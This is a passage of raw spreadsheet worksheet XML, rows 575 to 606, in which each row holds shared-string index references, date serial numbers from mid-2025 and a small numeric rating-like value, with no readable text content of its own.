    <row r="575" s="1" customFormat="1" ht="15" customHeight="1" spans="1:21">
      <c r="A575" s="1" t="s">
        <v>11</v>
      </c>
      <c r="B575" s="1" t="s">
        <v>20</v>
      </c>
      <c r="C575" s="4" t="s">
        <v>2843</v>
      </c>
      <c r="D575" s="4" t="s">
        <v>37</v>
      </c>
      <c r="E575" s="4" t="s">
        <v>2844</v>
      </c>
      <c r="F575" s="4" t="s">
        <v>1556</v>
      </c>
      <c r="G575" s="7">
        <v>45784</v>
      </c>
      <c r="H575" s="4" t="s">
        <v>2845</v>
      </c>
      <c r="I575" s="4" t="s">
        <v>1558</v>
      </c>
      <c r="J575" s="4">
        <v>5</v>
      </c>
      <c r="N575" s="11"/>
      <c r="O575" s="11"/>
      <c r="P575" s="11"/>
      <c r="Q575" s="11"/>
      <c r="R575" s="11"/>
      <c r="S575" s="11"/>
      <c r="T575" s="11"/>
      <c r="U575" s="11"/>
    </row>
    <row r="576" s="1" customFormat="1" ht="15" customHeight="1" spans="1:21">
      <c r="A576" s="1" t="s">
        <v>11</v>
      </c>
      <c r="B576" s="1" t="s">
        <v>12</v>
      </c>
      <c r="C576" s="4" t="s">
        <v>2846</v>
      </c>
      <c r="D576" s="4" t="s">
        <v>121</v>
      </c>
      <c r="E576" s="4" t="s">
        <v>2847</v>
      </c>
      <c r="F576" s="4" t="s">
        <v>2848</v>
      </c>
      <c r="G576" s="7">
        <v>45784</v>
      </c>
      <c r="H576" s="4" t="s">
        <v>2849</v>
      </c>
      <c r="I576" s="4" t="s">
        <v>2850</v>
      </c>
      <c r="J576" s="4">
        <v>5</v>
      </c>
      <c r="N576" s="11"/>
      <c r="O576" s="11"/>
      <c r="P576" s="11"/>
      <c r="Q576" s="11"/>
      <c r="R576" s="11"/>
      <c r="S576" s="11"/>
      <c r="T576" s="11"/>
      <c r="U576" s="11"/>
    </row>
    <row r="577" s="1" customFormat="1" ht="15" customHeight="1" spans="1:21">
      <c r="A577" s="1" t="s">
        <v>11</v>
      </c>
      <c r="B577" s="1" t="s">
        <v>20</v>
      </c>
      <c r="C577" s="4" t="s">
        <v>2851</v>
      </c>
      <c r="D577" s="4" t="s">
        <v>150</v>
      </c>
      <c r="E577" s="4" t="s">
        <v>2852</v>
      </c>
      <c r="F577" s="4" t="s">
        <v>2853</v>
      </c>
      <c r="G577" s="7">
        <v>45784</v>
      </c>
      <c r="H577" s="4" t="s">
        <v>2854</v>
      </c>
      <c r="I577" s="4" t="s">
        <v>2855</v>
      </c>
      <c r="J577" s="4">
        <v>2</v>
      </c>
      <c r="N577" s="11"/>
      <c r="O577" s="11"/>
      <c r="P577" s="11"/>
      <c r="Q577" s="11"/>
      <c r="R577" s="11"/>
      <c r="S577" s="11"/>
      <c r="T577" s="11"/>
      <c r="U577" s="11"/>
    </row>
    <row r="578" s="1" customFormat="1" ht="15" customHeight="1" spans="1:21">
      <c r="A578" s="1" t="s">
        <v>11</v>
      </c>
      <c r="B578" s="1" t="s">
        <v>20</v>
      </c>
      <c r="C578" s="4" t="s">
        <v>2856</v>
      </c>
      <c r="D578" s="4" t="s">
        <v>2226</v>
      </c>
      <c r="E578" s="4" t="s">
        <v>2857</v>
      </c>
      <c r="F578" s="4" t="s">
        <v>2858</v>
      </c>
      <c r="G578" s="7">
        <v>45785</v>
      </c>
      <c r="H578" s="4" t="s">
        <v>2859</v>
      </c>
      <c r="I578" s="4" t="s">
        <v>2860</v>
      </c>
      <c r="J578" s="4">
        <v>4</v>
      </c>
      <c r="N578" s="11"/>
      <c r="O578" s="11"/>
      <c r="P578" s="11"/>
      <c r="Q578" s="11"/>
      <c r="R578" s="11"/>
      <c r="S578" s="11"/>
      <c r="T578" s="11"/>
      <c r="U578" s="11"/>
    </row>
    <row r="579" s="1" customFormat="1" ht="15" customHeight="1" spans="1:21">
      <c r="A579" s="1" t="s">
        <v>19</v>
      </c>
      <c r="B579" s="1" t="s">
        <v>20</v>
      </c>
      <c r="C579" s="17" t="s">
        <v>2861</v>
      </c>
      <c r="D579" s="17" t="s">
        <v>22</v>
      </c>
      <c r="E579" s="17" t="s">
        <v>2862</v>
      </c>
      <c r="F579" s="17" t="s">
        <v>2863</v>
      </c>
      <c r="G579" s="7">
        <v>45787</v>
      </c>
      <c r="H579" s="17" t="s">
        <v>2864</v>
      </c>
      <c r="I579" s="17" t="s">
        <v>2865</v>
      </c>
      <c r="J579" s="17">
        <v>3</v>
      </c>
      <c r="N579" s="11"/>
      <c r="O579" s="11"/>
      <c r="P579" s="11"/>
      <c r="Q579" s="11"/>
      <c r="R579" s="11"/>
      <c r="S579" s="11"/>
      <c r="T579" s="11"/>
      <c r="U579" s="11"/>
    </row>
    <row r="580" s="1" customFormat="1" ht="15" customHeight="1" spans="1:21">
      <c r="A580" s="1" t="s">
        <v>11</v>
      </c>
      <c r="B580" s="1" t="s">
        <v>20</v>
      </c>
      <c r="C580" s="17" t="s">
        <v>2866</v>
      </c>
      <c r="D580" s="17" t="s">
        <v>67</v>
      </c>
      <c r="E580" s="17" t="s">
        <v>2867</v>
      </c>
      <c r="F580" s="17" t="s">
        <v>2868</v>
      </c>
      <c r="G580" s="7">
        <v>45787</v>
      </c>
      <c r="H580" s="17" t="s">
        <v>2869</v>
      </c>
      <c r="I580" s="17" t="s">
        <v>2870</v>
      </c>
      <c r="J580" s="17">
        <v>1</v>
      </c>
      <c r="N580" s="11"/>
      <c r="O580" s="11"/>
      <c r="P580" s="11"/>
      <c r="Q580" s="11"/>
      <c r="R580" s="11"/>
      <c r="S580" s="11"/>
      <c r="T580" s="11"/>
      <c r="U580" s="11"/>
    </row>
    <row r="581" s="1" customFormat="1" ht="15" customHeight="1" spans="1:21">
      <c r="A581" s="1" t="s">
        <v>11</v>
      </c>
      <c r="B581" s="1" t="s">
        <v>20</v>
      </c>
      <c r="C581" s="17" t="s">
        <v>2871</v>
      </c>
      <c r="D581" s="17" t="s">
        <v>67</v>
      </c>
      <c r="E581" s="17" t="s">
        <v>2872</v>
      </c>
      <c r="F581" s="17" t="s">
        <v>2873</v>
      </c>
      <c r="G581" s="7">
        <v>45788</v>
      </c>
      <c r="H581" s="17" t="s">
        <v>2874</v>
      </c>
      <c r="I581" s="17" t="s">
        <v>2875</v>
      </c>
      <c r="J581" s="17">
        <v>5</v>
      </c>
      <c r="N581" s="11"/>
      <c r="O581" s="11"/>
      <c r="P581" s="11"/>
      <c r="Q581" s="11"/>
      <c r="R581" s="11"/>
      <c r="S581" s="11"/>
      <c r="T581" s="11"/>
      <c r="U581" s="11"/>
    </row>
    <row r="582" s="1" customFormat="1" ht="15" customHeight="1" spans="1:21">
      <c r="A582" s="1" t="s">
        <v>11</v>
      </c>
      <c r="B582" s="1" t="s">
        <v>20</v>
      </c>
      <c r="C582" s="17" t="s">
        <v>2876</v>
      </c>
      <c r="D582" s="17" t="s">
        <v>37</v>
      </c>
      <c r="E582" s="17" t="s">
        <v>2877</v>
      </c>
      <c r="F582" s="17" t="s">
        <v>2878</v>
      </c>
      <c r="G582" s="7">
        <v>45789</v>
      </c>
      <c r="H582" s="17" t="s">
        <v>2879</v>
      </c>
      <c r="I582" s="17" t="s">
        <v>2880</v>
      </c>
      <c r="J582" s="17">
        <v>3</v>
      </c>
      <c r="N582" s="11"/>
      <c r="O582" s="11"/>
      <c r="P582" s="11"/>
      <c r="Q582" s="11"/>
      <c r="R582" s="11"/>
      <c r="S582" s="11"/>
      <c r="T582" s="11"/>
      <c r="U582" s="11"/>
    </row>
    <row r="583" s="1" customFormat="1" ht="15" customHeight="1" spans="1:21">
      <c r="A583" s="1" t="s">
        <v>19</v>
      </c>
      <c r="B583" s="1" t="s">
        <v>12</v>
      </c>
      <c r="C583" s="17" t="s">
        <v>2881</v>
      </c>
      <c r="D583" s="17" t="s">
        <v>141</v>
      </c>
      <c r="E583" s="17" t="s">
        <v>2882</v>
      </c>
      <c r="F583" s="17" t="s">
        <v>2883</v>
      </c>
      <c r="G583" s="7">
        <v>45790</v>
      </c>
      <c r="H583" s="17" t="s">
        <v>2884</v>
      </c>
      <c r="I583" s="17" t="s">
        <v>2885</v>
      </c>
      <c r="J583" s="17">
        <v>1</v>
      </c>
      <c r="N583" s="11"/>
      <c r="O583" s="11"/>
      <c r="P583" s="11"/>
      <c r="Q583" s="11"/>
      <c r="R583" s="11"/>
      <c r="S583" s="11"/>
      <c r="T583" s="11"/>
      <c r="U583" s="11"/>
    </row>
    <row r="584" s="1" customFormat="1" ht="15" customHeight="1" spans="1:21">
      <c r="A584" s="1" t="s">
        <v>19</v>
      </c>
      <c r="B584" s="1" t="s">
        <v>12</v>
      </c>
      <c r="C584" s="17" t="s">
        <v>2886</v>
      </c>
      <c r="D584" s="17" t="s">
        <v>928</v>
      </c>
      <c r="E584" s="17" t="s">
        <v>2887</v>
      </c>
      <c r="F584" s="17" t="s">
        <v>2888</v>
      </c>
      <c r="G584" s="7">
        <v>45790</v>
      </c>
      <c r="H584" s="17" t="s">
        <v>2889</v>
      </c>
      <c r="I584" s="17" t="s">
        <v>2890</v>
      </c>
      <c r="J584" s="17">
        <v>4</v>
      </c>
      <c r="N584" s="11"/>
      <c r="O584" s="11"/>
      <c r="P584" s="11"/>
      <c r="Q584" s="11"/>
      <c r="R584" s="11"/>
      <c r="S584" s="11"/>
      <c r="T584" s="11"/>
      <c r="U584" s="11"/>
    </row>
    <row r="585" s="1" customFormat="1" ht="15" customHeight="1" spans="1:21">
      <c r="A585" s="1" t="s">
        <v>11</v>
      </c>
      <c r="B585" s="1" t="s">
        <v>20</v>
      </c>
      <c r="C585" s="17" t="s">
        <v>2891</v>
      </c>
      <c r="D585" s="17" t="s">
        <v>1935</v>
      </c>
      <c r="E585" s="17" t="s">
        <v>2892</v>
      </c>
      <c r="F585" s="17" t="s">
        <v>2893</v>
      </c>
      <c r="G585" s="7">
        <v>45791</v>
      </c>
      <c r="H585" s="17" t="s">
        <v>2894</v>
      </c>
      <c r="I585" s="17" t="s">
        <v>2895</v>
      </c>
      <c r="J585" s="17">
        <v>1</v>
      </c>
      <c r="N585" s="11"/>
      <c r="O585" s="11"/>
      <c r="P585" s="11"/>
      <c r="Q585" s="11"/>
      <c r="R585" s="11"/>
      <c r="S585" s="11"/>
      <c r="T585" s="11"/>
      <c r="U585" s="11"/>
    </row>
    <row r="586" s="1" customFormat="1" ht="15" customHeight="1" spans="1:21">
      <c r="A586" s="1" t="s">
        <v>19</v>
      </c>
      <c r="B586" s="1" t="s">
        <v>20</v>
      </c>
      <c r="C586" s="17" t="s">
        <v>2896</v>
      </c>
      <c r="D586" s="17" t="s">
        <v>92</v>
      </c>
      <c r="E586" s="17" t="s">
        <v>2897</v>
      </c>
      <c r="F586" s="17" t="s">
        <v>2898</v>
      </c>
      <c r="G586" s="7">
        <v>45791</v>
      </c>
      <c r="H586" s="17" t="s">
        <v>2899</v>
      </c>
      <c r="I586" s="17" t="s">
        <v>2900</v>
      </c>
      <c r="J586" s="17">
        <v>5</v>
      </c>
      <c r="N586" s="11"/>
      <c r="O586" s="11"/>
      <c r="P586" s="11"/>
      <c r="Q586" s="11"/>
      <c r="R586" s="11"/>
      <c r="S586" s="11"/>
      <c r="T586" s="11"/>
      <c r="U586" s="11"/>
    </row>
    <row r="587" s="1" customFormat="1" ht="15" customHeight="1" spans="1:21">
      <c r="A587" s="1" t="s">
        <v>19</v>
      </c>
      <c r="B587" s="1" t="s">
        <v>20</v>
      </c>
      <c r="C587" s="17" t="s">
        <v>2901</v>
      </c>
      <c r="D587" s="17" t="s">
        <v>22</v>
      </c>
      <c r="E587" s="17" t="s">
        <v>2902</v>
      </c>
      <c r="F587" s="17" t="s">
        <v>2903</v>
      </c>
      <c r="G587" s="7">
        <v>45791</v>
      </c>
      <c r="H587" s="17">
        <v>1</v>
      </c>
      <c r="I587" s="17" t="s">
        <v>2904</v>
      </c>
      <c r="J587" s="17">
        <v>5</v>
      </c>
      <c r="N587" s="11"/>
      <c r="O587" s="11"/>
      <c r="P587" s="11"/>
      <c r="Q587" s="11"/>
      <c r="R587" s="11"/>
      <c r="S587" s="11"/>
      <c r="T587" s="11"/>
      <c r="U587" s="11"/>
    </row>
    <row r="588" s="1" customFormat="1" ht="15" customHeight="1" spans="1:21">
      <c r="A588" s="1" t="s">
        <v>11</v>
      </c>
      <c r="B588" s="1" t="s">
        <v>20</v>
      </c>
      <c r="C588" s="17" t="s">
        <v>2905</v>
      </c>
      <c r="D588" s="17" t="s">
        <v>98</v>
      </c>
      <c r="E588" s="17" t="s">
        <v>2906</v>
      </c>
      <c r="F588" s="17" t="s">
        <v>2907</v>
      </c>
      <c r="G588" s="7">
        <v>45791</v>
      </c>
      <c r="H588" s="17" t="s">
        <v>2908</v>
      </c>
      <c r="I588" s="17" t="s">
        <v>2909</v>
      </c>
      <c r="J588" s="17">
        <v>5</v>
      </c>
      <c r="N588" s="11"/>
      <c r="O588" s="11"/>
      <c r="P588" s="11"/>
      <c r="Q588" s="11"/>
      <c r="R588" s="11"/>
      <c r="S588" s="11"/>
      <c r="T588" s="11"/>
      <c r="U588" s="11"/>
    </row>
    <row r="589" s="1" customFormat="1" ht="15" customHeight="1" spans="1:21">
      <c r="A589" s="1" t="s">
        <v>11</v>
      </c>
      <c r="B589" s="1" t="s">
        <v>20</v>
      </c>
      <c r="C589" s="17" t="s">
        <v>2910</v>
      </c>
      <c r="D589" s="17" t="s">
        <v>67</v>
      </c>
      <c r="E589" s="17" t="s">
        <v>2911</v>
      </c>
      <c r="F589" s="17" t="s">
        <v>2912</v>
      </c>
      <c r="G589" s="7">
        <v>45791</v>
      </c>
      <c r="H589" s="17" t="s">
        <v>2913</v>
      </c>
      <c r="I589" s="17" t="s">
        <v>2914</v>
      </c>
      <c r="J589" s="17">
        <v>4</v>
      </c>
      <c r="N589" s="11"/>
      <c r="O589" s="11"/>
      <c r="P589" s="11"/>
      <c r="Q589" s="11"/>
      <c r="R589" s="11"/>
      <c r="S589" s="11"/>
      <c r="T589" s="11"/>
      <c r="U589" s="11"/>
    </row>
    <row r="590" s="1" customFormat="1" ht="15" customHeight="1" spans="1:21">
      <c r="A590" s="1" t="s">
        <v>19</v>
      </c>
      <c r="B590" s="1" t="s">
        <v>12</v>
      </c>
      <c r="C590" s="17" t="s">
        <v>2915</v>
      </c>
      <c r="D590" s="17" t="s">
        <v>141</v>
      </c>
      <c r="E590" s="17" t="s">
        <v>2916</v>
      </c>
      <c r="F590" s="17" t="s">
        <v>2917</v>
      </c>
      <c r="G590" s="7">
        <v>45792</v>
      </c>
      <c r="H590" s="17" t="s">
        <v>2918</v>
      </c>
      <c r="I590" s="17" t="s">
        <v>2919</v>
      </c>
      <c r="J590" s="17">
        <v>1</v>
      </c>
      <c r="N590" s="11"/>
      <c r="O590" s="11"/>
      <c r="P590" s="11"/>
      <c r="Q590" s="11"/>
      <c r="R590" s="11"/>
      <c r="S590" s="11"/>
      <c r="T590" s="11"/>
      <c r="U590" s="11"/>
    </row>
    <row r="591" s="1" customFormat="1" ht="15" customHeight="1" spans="1:21">
      <c r="A591" s="1" t="s">
        <v>11</v>
      </c>
      <c r="B591" s="1" t="s">
        <v>20</v>
      </c>
      <c r="C591" s="17" t="s">
        <v>2920</v>
      </c>
      <c r="D591" s="17" t="s">
        <v>2921</v>
      </c>
      <c r="E591" s="17" t="s">
        <v>2922</v>
      </c>
      <c r="F591" s="17" t="s">
        <v>2923</v>
      </c>
      <c r="G591" s="7">
        <v>45792</v>
      </c>
      <c r="H591" s="17" t="s">
        <v>2924</v>
      </c>
      <c r="I591" s="17" t="s">
        <v>2925</v>
      </c>
      <c r="J591" s="17">
        <v>1</v>
      </c>
      <c r="N591" s="11"/>
      <c r="O591" s="11"/>
      <c r="P591" s="11"/>
      <c r="Q591" s="11"/>
      <c r="R591" s="11"/>
      <c r="S591" s="11"/>
      <c r="T591" s="11"/>
      <c r="U591" s="11"/>
    </row>
    <row r="592" s="1" customFormat="1" ht="15" customHeight="1" spans="1:21">
      <c r="A592" s="1" t="s">
        <v>19</v>
      </c>
      <c r="B592" s="1" t="s">
        <v>12</v>
      </c>
      <c r="C592" s="17" t="s">
        <v>2926</v>
      </c>
      <c r="D592" s="17" t="s">
        <v>141</v>
      </c>
      <c r="E592" s="17" t="s">
        <v>2927</v>
      </c>
      <c r="F592" s="17" t="s">
        <v>2928</v>
      </c>
      <c r="G592" s="7">
        <v>45792</v>
      </c>
      <c r="H592" s="17" t="s">
        <v>2929</v>
      </c>
      <c r="I592" s="17" t="s">
        <v>2930</v>
      </c>
      <c r="J592" s="17">
        <v>1</v>
      </c>
      <c r="N592" s="11"/>
      <c r="O592" s="11"/>
      <c r="P592" s="11"/>
      <c r="Q592" s="11"/>
      <c r="R592" s="11"/>
      <c r="S592" s="11"/>
      <c r="T592" s="11"/>
      <c r="U592" s="11"/>
    </row>
    <row r="593" s="1" customFormat="1" ht="15" customHeight="1" spans="1:21">
      <c r="A593" s="1" t="s">
        <v>11</v>
      </c>
      <c r="B593" s="1" t="s">
        <v>20</v>
      </c>
      <c r="C593" s="17" t="s">
        <v>2931</v>
      </c>
      <c r="D593" s="17" t="s">
        <v>98</v>
      </c>
      <c r="E593" s="17" t="s">
        <v>2932</v>
      </c>
      <c r="F593" s="17" t="s">
        <v>2907</v>
      </c>
      <c r="G593" s="7">
        <v>45792</v>
      </c>
      <c r="H593" s="17" t="s">
        <v>2933</v>
      </c>
      <c r="I593" s="17" t="s">
        <v>2909</v>
      </c>
      <c r="J593" s="17">
        <v>5</v>
      </c>
      <c r="N593" s="11"/>
      <c r="O593" s="11"/>
      <c r="P593" s="11"/>
      <c r="Q593" s="11"/>
      <c r="R593" s="11"/>
      <c r="S593" s="11"/>
      <c r="T593" s="11"/>
      <c r="U593" s="11"/>
    </row>
    <row r="594" s="1" customFormat="1" ht="15" customHeight="1" spans="1:21">
      <c r="A594" s="1" t="s">
        <v>11</v>
      </c>
      <c r="B594" s="1" t="s">
        <v>12</v>
      </c>
      <c r="C594" s="17" t="s">
        <v>2934</v>
      </c>
      <c r="D594" s="17" t="s">
        <v>507</v>
      </c>
      <c r="E594" s="17" t="s">
        <v>2935</v>
      </c>
      <c r="F594" s="17" t="s">
        <v>2936</v>
      </c>
      <c r="G594" s="7">
        <v>45794</v>
      </c>
      <c r="H594" s="17" t="s">
        <v>2937</v>
      </c>
      <c r="I594" s="17" t="s">
        <v>2938</v>
      </c>
      <c r="J594" s="17">
        <v>1</v>
      </c>
      <c r="N594" s="11"/>
      <c r="O594" s="11"/>
      <c r="P594" s="11"/>
      <c r="Q594" s="11"/>
      <c r="R594" s="11"/>
      <c r="S594" s="11"/>
      <c r="T594" s="11"/>
      <c r="U594" s="11"/>
    </row>
    <row r="595" s="1" customFormat="1" ht="15" customHeight="1" spans="1:21">
      <c r="A595" s="1" t="s">
        <v>11</v>
      </c>
      <c r="B595" s="1" t="s">
        <v>20</v>
      </c>
      <c r="C595" s="17" t="s">
        <v>2939</v>
      </c>
      <c r="D595" s="17" t="s">
        <v>67</v>
      </c>
      <c r="E595" s="17" t="s">
        <v>2940</v>
      </c>
      <c r="F595" s="17" t="s">
        <v>2941</v>
      </c>
      <c r="G595" s="7">
        <v>45794</v>
      </c>
      <c r="H595" s="17" t="s">
        <v>2942</v>
      </c>
      <c r="I595" s="17" t="s">
        <v>2943</v>
      </c>
      <c r="J595" s="17">
        <v>2</v>
      </c>
      <c r="N595" s="11"/>
      <c r="O595" s="11"/>
      <c r="P595" s="11"/>
      <c r="Q595" s="11"/>
      <c r="R595" s="11"/>
      <c r="S595" s="11"/>
      <c r="T595" s="11"/>
      <c r="U595" s="11"/>
    </row>
    <row r="596" s="1" customFormat="1" ht="15" customHeight="1" spans="1:21">
      <c r="A596" s="1" t="s">
        <v>11</v>
      </c>
      <c r="B596" s="1" t="s">
        <v>20</v>
      </c>
      <c r="C596" s="17" t="s">
        <v>2944</v>
      </c>
      <c r="D596" s="17" t="s">
        <v>67</v>
      </c>
      <c r="E596" s="17" t="s">
        <v>2945</v>
      </c>
      <c r="F596" s="17" t="s">
        <v>2946</v>
      </c>
      <c r="G596" s="7">
        <v>45795</v>
      </c>
      <c r="H596" s="17" t="s">
        <v>2947</v>
      </c>
      <c r="I596" s="17" t="s">
        <v>2948</v>
      </c>
      <c r="J596" s="17">
        <v>5</v>
      </c>
      <c r="N596" s="11"/>
      <c r="O596" s="11"/>
      <c r="P596" s="11"/>
      <c r="Q596" s="11"/>
      <c r="R596" s="11"/>
      <c r="S596" s="11"/>
      <c r="T596" s="11"/>
      <c r="U596" s="11"/>
    </row>
    <row r="597" s="1" customFormat="1" ht="15" customHeight="1" spans="1:21">
      <c r="A597" s="1" t="s">
        <v>11</v>
      </c>
      <c r="B597" s="1" t="s">
        <v>20</v>
      </c>
      <c r="C597" s="17" t="s">
        <v>2949</v>
      </c>
      <c r="D597" s="17" t="s">
        <v>67</v>
      </c>
      <c r="E597" s="17" t="s">
        <v>2950</v>
      </c>
      <c r="F597" s="17" t="s">
        <v>2951</v>
      </c>
      <c r="G597" s="7">
        <v>45795</v>
      </c>
      <c r="H597" s="17" t="s">
        <v>2952</v>
      </c>
      <c r="I597" s="17" t="s">
        <v>2953</v>
      </c>
      <c r="J597" s="17">
        <v>5</v>
      </c>
      <c r="N597" s="11"/>
      <c r="O597" s="11"/>
      <c r="P597" s="11"/>
      <c r="Q597" s="11"/>
      <c r="R597" s="11"/>
      <c r="S597" s="11"/>
      <c r="T597" s="11"/>
      <c r="U597" s="11"/>
    </row>
    <row r="598" s="1" customFormat="1" ht="15" customHeight="1" spans="1:21">
      <c r="A598" s="1" t="s">
        <v>11</v>
      </c>
      <c r="B598" s="1" t="s">
        <v>20</v>
      </c>
      <c r="C598" s="17" t="s">
        <v>2954</v>
      </c>
      <c r="D598" s="17" t="s">
        <v>37</v>
      </c>
      <c r="E598" s="17" t="s">
        <v>2955</v>
      </c>
      <c r="F598" s="17" t="s">
        <v>2956</v>
      </c>
      <c r="G598" s="7">
        <v>45796</v>
      </c>
      <c r="H598" s="17" t="s">
        <v>2957</v>
      </c>
      <c r="I598" s="17" t="s">
        <v>2958</v>
      </c>
      <c r="J598" s="17">
        <v>1</v>
      </c>
      <c r="N598" s="11"/>
      <c r="O598" s="11"/>
      <c r="P598" s="11"/>
      <c r="Q598" s="11"/>
      <c r="R598" s="11"/>
      <c r="S598" s="11"/>
      <c r="T598" s="11"/>
      <c r="U598" s="11"/>
    </row>
    <row r="599" s="1" customFormat="1" ht="15" customHeight="1" spans="1:21">
      <c r="A599" s="1" t="s">
        <v>11</v>
      </c>
      <c r="B599" s="1" t="s">
        <v>20</v>
      </c>
      <c r="C599" s="17" t="s">
        <v>2959</v>
      </c>
      <c r="D599" s="17" t="s">
        <v>2921</v>
      </c>
      <c r="E599" s="17" t="s">
        <v>2960</v>
      </c>
      <c r="F599" s="17" t="s">
        <v>2961</v>
      </c>
      <c r="G599" s="7">
        <v>45796</v>
      </c>
      <c r="H599" s="17" t="s">
        <v>2962</v>
      </c>
      <c r="I599" s="17" t="s">
        <v>2963</v>
      </c>
      <c r="J599" s="17">
        <v>2</v>
      </c>
      <c r="N599" s="11"/>
      <c r="O599" s="11"/>
      <c r="P599" s="11"/>
      <c r="Q599" s="11"/>
      <c r="R599" s="11"/>
      <c r="S599" s="11"/>
      <c r="T599" s="11"/>
      <c r="U599" s="11"/>
    </row>
    <row r="600" s="1" customFormat="1" ht="15" customHeight="1" spans="1:21">
      <c r="A600" s="1" t="s">
        <v>19</v>
      </c>
      <c r="B600" s="1" t="s">
        <v>20</v>
      </c>
      <c r="C600" s="17" t="s">
        <v>2964</v>
      </c>
      <c r="D600" s="17" t="s">
        <v>22</v>
      </c>
      <c r="E600" s="17" t="s">
        <v>2965</v>
      </c>
      <c r="F600" s="17" t="s">
        <v>2966</v>
      </c>
      <c r="G600" s="7">
        <v>45796</v>
      </c>
      <c r="H600" s="15" t="s">
        <v>2967</v>
      </c>
      <c r="I600" s="17" t="s">
        <v>2968</v>
      </c>
      <c r="J600" s="17">
        <v>1</v>
      </c>
      <c r="N600" s="11"/>
      <c r="O600" s="11"/>
      <c r="P600" s="11"/>
      <c r="Q600" s="11"/>
      <c r="R600" s="11"/>
      <c r="S600" s="11"/>
      <c r="T600" s="11"/>
      <c r="U600" s="11"/>
    </row>
    <row r="601" s="1" customFormat="1" ht="15" customHeight="1" spans="1:21">
      <c r="A601" s="1" t="s">
        <v>19</v>
      </c>
      <c r="B601" s="1" t="s">
        <v>20</v>
      </c>
      <c r="C601" s="17" t="s">
        <v>2969</v>
      </c>
      <c r="D601" s="17" t="s">
        <v>92</v>
      </c>
      <c r="E601" s="17" t="s">
        <v>2970</v>
      </c>
      <c r="F601" s="17" t="s">
        <v>2971</v>
      </c>
      <c r="G601" s="7">
        <v>45796</v>
      </c>
      <c r="H601" s="17" t="s">
        <v>2972</v>
      </c>
      <c r="I601" s="17" t="s">
        <v>2973</v>
      </c>
      <c r="J601" s="17">
        <v>2</v>
      </c>
      <c r="N601" s="11"/>
      <c r="O601" s="11"/>
      <c r="P601" s="11"/>
      <c r="Q601" s="11"/>
      <c r="R601" s="11"/>
      <c r="S601" s="11"/>
      <c r="T601" s="11"/>
      <c r="U601" s="11"/>
    </row>
    <row r="602" s="1" customFormat="1" ht="15" customHeight="1" spans="1:21">
      <c r="A602" s="1" t="s">
        <v>11</v>
      </c>
      <c r="B602" s="1" t="s">
        <v>12</v>
      </c>
      <c r="C602" s="17" t="s">
        <v>2974</v>
      </c>
      <c r="D602" s="17" t="s">
        <v>507</v>
      </c>
      <c r="E602" s="17" t="s">
        <v>2975</v>
      </c>
      <c r="F602" s="17" t="s">
        <v>2976</v>
      </c>
      <c r="G602" s="7">
        <v>45797</v>
      </c>
      <c r="H602" s="17" t="s">
        <v>2977</v>
      </c>
      <c r="I602" s="17" t="s">
        <v>2978</v>
      </c>
      <c r="J602" s="17">
        <v>5</v>
      </c>
      <c r="N602" s="11"/>
      <c r="O602" s="11"/>
      <c r="P602" s="11"/>
      <c r="Q602" s="11"/>
      <c r="R602" s="11"/>
      <c r="S602" s="11"/>
      <c r="T602" s="11"/>
      <c r="U602" s="11"/>
    </row>
    <row r="603" s="1" customFormat="1" ht="15" customHeight="1" spans="1:21">
      <c r="A603" s="1" t="s">
        <v>19</v>
      </c>
      <c r="B603" s="1" t="s">
        <v>20</v>
      </c>
      <c r="C603" s="17" t="s">
        <v>2979</v>
      </c>
      <c r="D603" s="17" t="s">
        <v>92</v>
      </c>
      <c r="E603" s="17" t="s">
        <v>2980</v>
      </c>
      <c r="F603" s="17" t="s">
        <v>2981</v>
      </c>
      <c r="G603" s="7">
        <v>45797</v>
      </c>
      <c r="H603" s="17" t="s">
        <v>2982</v>
      </c>
      <c r="I603" s="17" t="s">
        <v>2983</v>
      </c>
      <c r="J603" s="17">
        <v>1</v>
      </c>
      <c r="N603" s="11"/>
      <c r="O603" s="11"/>
      <c r="P603" s="11"/>
      <c r="Q603" s="11"/>
      <c r="R603" s="11"/>
      <c r="S603" s="11"/>
      <c r="T603" s="11"/>
      <c r="U603" s="11"/>
    </row>
    <row r="604" s="1" customFormat="1" ht="15" customHeight="1" spans="1:10">
      <c r="A604" s="1" t="s">
        <v>11</v>
      </c>
      <c r="B604" s="1" t="s">
        <v>20</v>
      </c>
      <c r="C604" s="17" t="s">
        <v>2984</v>
      </c>
      <c r="D604" s="17" t="s">
        <v>48</v>
      </c>
      <c r="E604" s="17" t="s">
        <v>2985</v>
      </c>
      <c r="F604" s="17" t="s">
        <v>2986</v>
      </c>
      <c r="G604" s="7">
        <v>45798</v>
      </c>
      <c r="H604" s="17" t="s">
        <v>2987</v>
      </c>
      <c r="I604" s="17" t="s">
        <v>2988</v>
      </c>
      <c r="J604" s="17">
        <v>1</v>
      </c>
    </row>
    <row r="605" s="1" customFormat="1" ht="15" customHeight="1" spans="1:21">
      <c r="A605" s="1" t="s">
        <v>19</v>
      </c>
      <c r="B605" s="1" t="s">
        <v>20</v>
      </c>
      <c r="C605" s="17" t="s">
        <v>2989</v>
      </c>
      <c r="D605" s="17" t="s">
        <v>92</v>
      </c>
      <c r="E605" s="17" t="s">
        <v>2990</v>
      </c>
      <c r="F605" s="17" t="s">
        <v>2991</v>
      </c>
      <c r="G605" s="7">
        <v>45800</v>
      </c>
      <c r="H605" s="17" t="s">
        <v>2992</v>
      </c>
      <c r="I605" s="17" t="s">
        <v>2993</v>
      </c>
      <c r="J605" s="17">
        <v>2</v>
      </c>
      <c r="N605" s="11"/>
      <c r="O605" s="11"/>
      <c r="P605" s="11"/>
      <c r="Q605" s="11"/>
      <c r="R605" s="11"/>
      <c r="S605" s="11"/>
      <c r="T605" s="11"/>
      <c r="U605" s="11"/>
    </row>
    <row r="606" s="1" customFormat="1" ht="15" customHeight="1" spans="1:21">
      <c r="A606" s="1" t="s">
        <v>19</v>
      </c>
      <c r="B606" s="1" t="s">
        <v>20</v>
      </c>
      <c r="C606" s="17" t="s">
        <v>2994</v>
      </c>
      <c r="D606" s="17" t="s">
        <v>92</v>
      </c>
      <c r="E606" s="17" t="s">
        <v>2995</v>
      </c>
      <c r="F606" s="17" t="s">
        <v>2996</v>
      </c>
      <c r="G606" s="7">
        <v>45800</v>
      </c>
      <c r="H606" s="17" t="s">
        <v>2997</v>
      </c>
      <c r="I606" s="17" t="s">
        <v>2998</v>
      </c>
      <c r="J606" s="17">
        <v>1</v>
      </c>
      <c r="N606" s="11"/>
      <c r="O606" s="11"/>
      <c r="P606" s="11"/>
      <c r="Q606" s="11"/>
      <c r="R606" s="11"/>
      <c r="S606" s="11"/>
      <c r="T606" s="11"/>
      <c r="U606" s="11"/>
    </row>
